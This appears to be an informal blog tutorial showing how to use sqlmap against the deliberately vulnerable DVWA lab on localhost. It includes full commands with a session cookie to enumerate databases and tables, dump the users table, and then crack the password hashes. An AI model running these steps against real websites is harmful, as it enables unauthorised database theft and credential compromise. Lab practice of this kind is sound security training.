Hello, buddy! have ever think why Oracle Corp will monopolize and commercialize Mysql? While many people already depended on it in their development. You do not need to answer it, seriously. Coz now we aren’t going to talk about that, but we’re gonna talk about how to use Sqlmap to extract database.
- You have apache2, mysql, phpmyadmin instaled on your system.
- I use DVWA for victim site, click here for more information and download link.
- You have found the vulnerable from DVWA site. Click here for tutorial.
- I use Mantra and Burp Suite for IG(Information Gathering). Click here for tutorial!. Important to find the cookie.
So let’s rock, here’s the step:
- First read the manual by typing “./sqlmap -h“.
- If you are already knew about the usage, let’s continue. Here’s the syntax “./sqlmap.py -u victim_url –cookie=Cookie –dbs” if the targeted website has login page we have to find the cookie, we can use Burp Suite. But if no, just go to vurnerable webseite immediately “./sqlmap.py -u victim_url –dbs“. Realize the differences among the the syntaxes, “-u” for url and “–dbs” for capturing database name. In my case will be like this:
./sqlmap.py -u “http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”security=low; PHPSESSID=bij3f95ead4t1ueh7t0qijoh02″ –dbs
- We got the database name now “dvwa“, the next duty is to get the tables name.
- Don’t be happy, we still get things to do.
Can you see the databases? Now guess which the related one is. Yeah you are right, dvwa is the one that we are looking for 😀
/sqlmap.py -u “http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”security=low; PHPSESSID=bij3f95ead4t1ueh7t0qijoh02″ -D dvwa –tables
Sure, you can see those tables name, nothing left to do just dumping that users table.
./sqlmap.py -u “http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”security=low; PHPSESSID=bij3f95ead4t1ueh7t0qijoh02″ -T users –dump
Viola…. the usenames and password appear.. it seems the passwords are encrypted (md5 maybe). Your last duty to solve it 😛